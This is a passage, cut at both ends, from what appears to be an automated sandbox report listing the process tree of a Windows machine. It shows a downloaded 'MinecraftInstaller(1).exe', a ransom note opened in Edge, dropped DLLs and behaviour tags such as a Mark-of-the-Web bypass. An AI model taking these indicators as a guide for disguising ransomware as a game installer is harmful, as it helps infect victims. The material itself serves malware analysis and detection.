      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "file:///C:/Users/Admin/Downloads/YOUR_FILES_ARE_ENCRYPTED.HTML"
        6⤵
        
        PID:4344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:1708

C:\Windows\SysWOW64\DllHost.exe
"C:\Windows\SysWOW64\DllHost.exe" /Processid:{5250E46F-BB09-D602-5891-F476DC89B700}
1⤵
- Loads dropped DLL
PID:4776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5180,i,6925591690600939166,85426131164229687,262144 --variations-seed-version --mojo-platform-channel-handle=5360 /prefetch:14
1⤵
PID:2796

C:\Windows\SysWOW64\DllHost.exe
"C:\Windows\SysWOW64\DllHost.exe" /Processid:{5250E46F-BB09-D602-5891-F476DC89B700}
1⤵
- Loads dropped DLL
PID:3160

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4492
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Downloads MZ/PE file
  - Mark of the Web detected: This indicates that the page was originally saved or cloned.
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 27419 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a733e39b-9a83-4c71-abbb-bf3a3add818b} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" gpu
    3⤵
    PID:868
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2360 -prefsLen 27297 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17cd46ce-fed3-4417-9555-eded6abf93f4} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" socket
    3⤵
    PID:5144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2744 -childID 1 -isForBrowser -prefsHandle 2976 -prefMapHandle 3392 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6493a10b-cac2-4f07-a1c4-4e81d65115f2} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5592
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4040 -childID 2 -isForBrowser -prefsHandle 4052 -prefMapHandle 4048 -prefsLen 32671 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3714820c-48bd-4d95-bb01-e737e7c8edcc} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4832 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4792 -prefMapHandle 4836 -prefsLen 32671 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0cbf896-4758-4073-9e33-0dee61fd716f} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" utility
    3⤵
    - Checks processor information in registry
    PID:6240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 3 -isForBrowser -prefsHandle 5248 -prefMapHandle 5196 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99a67c08-6f3c-4928-908d-1e06ce5d98fc} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7004
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5428 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e8652ec-1890-4d6b-aa5e-69129d808f40} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 5 -isForBrowser -prefsHandle 4764 -prefMapHandle 4768 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {382969d9-d1d6-458f-8c70-45aed881797d} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -childID 6 -isForBrowser -prefsHandle 5224 -prefMapHandle 3820 -prefsLen 34402 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8138cb27-8be9-4f26-900c-6b8e75c8eef9} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6108 -childID 7 -isForBrowser -prefsHandle 6104 -prefMapHandle 6100 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31fa5a89-a3c7-40e2-9f4c-931611605cf4} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6104
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5328 -childID 8 -isForBrowser -prefsHandle 5340 -prefMapHandle 5352 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {330d22ee-8d9e-4282-a3f4-81eab8eaa27f} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 9 -isForBrowser -prefsHandle 5312 -prefMapHandle 5288 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f794b30-72ff-4d74-ab11-a304fa549ba6} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6456 -childID 10 -isForBrowser -prefsHandle 6464 -prefMapHandle 6468 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3413adb7-4928-4b90-9656-5edfc15259e7} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6900
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6868 -parentBuildID 20240401114208 -prefsHandle 6876 -prefMapHandle 6880 -prefsLen 34481 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d225869-1da6-4867-a8c7-0afacdbccf9c} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" rdd
    3⤵
    PID:6220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7004 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 7000 -prefMapHandle 6844 -prefsLen 34481 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5917d288-a4d5-415b-8a2e-6d396bab5039} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" utility
    3⤵
    - Checks processor information in registry
    PID:6312
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6788 -childID 11 -isForBrowser -prefsHandle 7024 -prefMapHandle 2920 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe186eb2-2a7d-44a9-9806-6c618b7c2784} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 12 -isForBrowser -prefsHandle 7300 -prefMapHandle 7296 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38ec39f6-0f04-4041-af0d-c9ede680a4c1} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7412 -childID 13 -isForBrowser -prefsHandle 7452 -prefMapHandle 7456 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e237c57c-5e2d-48dc-9fee-769395f034f9} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5700
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7924 -childID 14 -isForBrowser -prefsHandle 7936 -prefMapHandle 7932 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2175065-37c9-4aee-abd5-0d76bd498ed8} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:1084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8156 -childID 15 -isForBrowser -prefsHandle 7728 -prefMapHandle 7732 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b743d682-3340-44e2-92c6-bfa860884c43} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8296 -childID 16 -isForBrowser -prefsHandle 8376 -prefMapHandle 8372 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45f02f2c-7bdb-4cc7-97b5-1fbc34ede781} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:4772
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6628 -childID 17 -isForBrowser -prefsHandle 6764 -prefMapHandle 6744 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {03e8fd3e-1c00-412c-b36e-8a378044fa00} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:2300
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8472 -childID 18 -isForBrowser -prefsHandle 8480 -prefMapHandle 8484 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73993b7c-7c20-4aa8-bb5d-953e0fe2fc5a} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:832
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8996 -childID 19 -isForBrowser -prefsHandle 8984 -prefMapHandle 8988 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b238692-e9ce-4ef5-912b-54f5f2003cfd} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9288 -childID 20 -isForBrowser -prefsHandle 9280 -prefMapHandle 9276 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b03d9c0-8044-4585-a4e7-a618dac6577d} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6748
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9428 -childID 21 -isForBrowser -prefsHandle 9436 -prefMapHandle 9444 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {361e0ea2-824d-4370-84d6-363cae3daf57} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:3128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9708 -childID 22 -isForBrowser -prefsHandle 9628 -prefMapHandle 9632 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d67dfa00-d58a-48fd-ad5f-b54a82f6308b} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:2384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8824 -childID 23 -isForBrowser -prefsHandle 8836 -prefMapHandle 8840 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {191015ff-c412-4c8c-8bd9-5c2b96e4b401} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9672 -childID 24 -isForBrowser -prefsHandle 9680 -prefMapHandle 9684 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac470bc9-555b-4b6c-846b-c6deb9e0d319} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9604 -childID 25 -isForBrowser -prefsHandle 10040 -prefMapHandle 10052 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c430c08c-1b8e-4bba-933e-aa5c7c3dbf1f} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6484 -childID 26 -isForBrowser -prefsHandle 6836 -prefMapHandle 6804 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29257d1b-81ae-4cab-9ba9-42f5213c549a} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:8136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6480 -childID 27 -isForBrowser -prefsHandle 7468 -prefMapHandle 8312 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c4f2f3d-1b42-4ea3-99de-f73e569b706b} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:2944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9664 -childID 28 -isForBrowser -prefsHandle 10196 -prefMapHandle 9652 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd6f4b37-719d-48a7-aaae-038fceabab21} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:8060
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4328 -childID 29 -isForBrowser -prefsHandle 9624 -prefMapHandle 9452 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4870cc0-3aff-424e-abcb-3a1c86e205cc} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5696
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8844 -childID 30 -isForBrowser -prefsHandle 8100 -prefMapHandle 6504 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f76aa3a9-c27a-4d29-a79a-722879bb92ca} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5908
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6576 -childID 31 -isForBrowser -prefsHandle 5544 -prefMapHandle 7172 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df1490e5-d7a0-46dc-9b94-c6724fc21729} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9868 -childID 32 -isForBrowser -prefsHandle 10836 -prefMapHandle 10944 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1a896fe-7576-4538-9ee2-62a9448e4540} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10236 -childID 33 -isForBrowser -prefsHandle 10856 -prefMapHandle 10852 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29bccbe7-909a-40ef-afaf-1fcc0b523d0f} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8480 -childID 34 -isForBrowser -prefsHandle 11108 -prefMapHandle 11104 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d0ec7df-d08c-40a1-96ce-cecc54522278} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11148 -childID 35 -isForBrowser -prefsHandle 8196 -prefMapHandle 8188 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fab654d4-666b-4d6f-9f69-b76da2ba82c1} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11168 -childID 36 -isForBrowser -prefsHandle 8704 -prefMapHandle 8692 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7af501b4-6a47-47c6-8c25-e4ad6d335583} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:8000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11188 -childID 37 -isForBrowser -prefsHandle 11192 -prefMapHandle 10108 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d6c136a-9eaa-45f8-9a59-769aaa1d4804} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:4784
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8196 -childID 38 -isForBrowser -prefsHandle 5336 -prefMapHandle 9804 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37cf508a-48f9-4f41-8f4c-96e6e8cb787c} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6260
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5304 -childID 39 -isForBrowser -prefsHandle 9796 -prefMapHandle 8136 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eecd379a-5da7-44e0-8e99-2413844e6b81} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9268 -childID 40 -isForBrowser -prefsHandle 8588 -prefMapHandle 8680 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21bfb01f-37de-4fc0-9363-4ce476a52b9f} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7640
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9812 -childID 41 -isForBrowser -prefsHandle 6404 -prefMapHandle 6412 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89c48a82-b231-4b55-ab2b-45aa9325a99e} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6684 -childID 42 -isForBrowser -prefsHandle 8512 -prefMapHandle 3320 -prefsLen 28084 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2813a25e-9bc4-4a53-ae15-d1e94c13d122} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8204 -childID 43 -isForBrowser -prefsHandle 8644 -prefMapHandle 10692 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd13349c-398e-4f02-84c9-dbda16ae259f} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:2216
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8200 -childID 44 -isForBrowser -prefsHandle 10692 -prefMapHandle 8644 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {571e623f-c279-496c-b07c-050f65b7e7f0} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9784 -childID 45 -isForBrowser -prefsHandle 10012 -prefMapHandle 9256 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {822b9d89-bd40-4134-8dd8-787042b09cf9} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:5480
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8660 -childID 46 -isForBrowser -prefsHandle 6860 -prefMapHandle 10204 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c555f668-60bc-463b-becb-87d5c3be3df7} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:6132
- - C:\Users\Admin\Downloads\MinecraftInstaller(1).exe
    "C:\Users\Admin\Downloads\MinecraftInstaller(1).exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:7396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3852 -childID 47 -isForBrowser -prefsHandle 7180 -prefMapHandle 8204 -prefsLen 28286 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f304325-2a57-4503-b576-550c55f3c1f8} 2984 "\\.\pipe\gecko-crash-server-pipe.2984" tab
    3⤵
    PID:7868
- - C:\Program Files\Mozilla Firefox\firefox.exe
